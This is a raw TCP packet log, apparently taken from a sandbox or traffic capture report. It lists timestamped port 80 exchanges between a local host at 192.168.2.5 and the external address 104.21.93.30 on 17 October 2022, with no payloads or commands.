                                                                                                                                  Oct 17, 2022 22:06:38.474524021 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.477229118 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.477269888 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.477293015 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.477330923 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.477370977 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.513350964 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.513387918 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.513439894 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.513506889 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.514168024 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514197111 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514214039 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514230967 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514251947 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514273882 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514277935 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.514292955 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514309883 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514327049 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514343023 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514352083 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.514362097 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514380932 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514384985 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.514401913 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514408112 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.514422894 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514441967 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514446020 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.514465094 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514481068 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514497042 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514506102 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.514518976 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514537096 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514540911 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.514554977 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514564037 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.514576912 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514595985 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514600039 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.514616966 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514636040 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.514637947 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514657021 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514673948 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514679909 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.514694929 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514715910 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.514717102 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514740944 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514758110 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.514764071 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514780998 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514797926 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.514803886 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514821053 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514837027 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.514842033 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514859915 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514892101 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.514900923 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514924049 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514939070 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.514952898 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514981031 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.514991999 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.515011072 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515029907 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515047073 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515062094 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515083075 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515099049 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515121937 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515125036 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.515141964 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515153885 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.515163898 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515181065 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.515187025 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515203953 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.515211105 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515228033 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515247107 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515250921 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.515266895 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515288115 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.515289068 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515309095 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515327930 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515331030 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.515347958 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515367985 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.515367985 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515387058 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515407085 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.515414953 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515434980 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515455008 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.515465975 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515482903 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515501022 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.515511036 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515531063 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515543938 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.515566111 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515568018 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.515589952 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515600920 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.515623093 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.515659094 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.515979052 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.516076088 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.516419888 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.516520023 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.516551971 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.516583920 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.516588926 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.516603947 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.516619921 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.516627073 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.516644955 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.516661882 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.516668081 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.516686916 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.516705990 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.516707897 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.516737938 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.516746044 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.516761065 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.516788960 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.516799927 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.516819000 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.516840935 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.516860008 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.516868114 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.516894102 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.516906977 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.516952991 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.516982079 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.516990900 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.517033100 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.517071009 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.517081976 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.517153025 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.517182112 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.517205000 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.517240047 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.517267942 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.517286062 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.518112898 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518138885 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518156052 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518176079 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518194914 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.518198013 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518218994 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.518222094 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518239021 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518256903 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.518263102 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518284082 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.518285990 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518305063 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518325090 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.518326044 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518343925 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518359900 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.518377066 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518410921 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.518410921 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518445969 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518466949 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518485069 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.518507004 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518537998 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518543005 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.518563986 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518590927 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518599033 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.518621922 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518640995 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518659115 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.518663883 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518682003 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518699884 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.518704891 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518724918 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518739939 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.518748045 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518770933 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518785954 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.518804073 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518821955 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518841982 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518842936 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.518861055 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518874884 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.518897057 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518925905 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518935919 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.518946886 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518965006 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.518981934 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.518995047 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519016027 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519032001 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.519047022 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519076109 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519084930 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.519109011 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519136906 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519144058 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.519171953 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519201040 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519208908 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.519229889 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519259930 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519268036 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.519290924 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519325972 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519335032 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.519356966 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519376040 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519398928 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.519437075 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519455910 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519479036 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.519479990 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519500017 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519515991 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.519521952 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519540071 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519556999 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.519562960 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519579887 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519597054 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.519602060 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519618988 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519635916 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.519640923 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519659042 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519675016 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.519680977 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519699097 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519717932 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.519721031 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519741058 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519757986 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.519763947 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519784927 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519798040 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.519808054 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519825935 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519846916 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.519849062 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519870043 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519886971 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.519893885 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519913912 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519929886 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.519937038 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519956112 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.519972086 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.519980907 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.520000935 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.520023108 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.520030022 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.520044088 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.520066023 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.520067930 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.520087004 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.520108938 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.520109892 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.520129919 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.520150900 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.520153999 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.520173073 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.520190001 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.520195961 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.520220041 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.520242929 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.520251036 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.520263910 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.520282984 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.520288944 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.520308971 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.520323038 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.520330906 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.520351887 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.520365000 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.520374060 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.520394087 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.520414114 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.520421982 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.520435095 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.520457029 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.520459890 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.520477057 CEST8049692104.21.93.30192.168.2.5
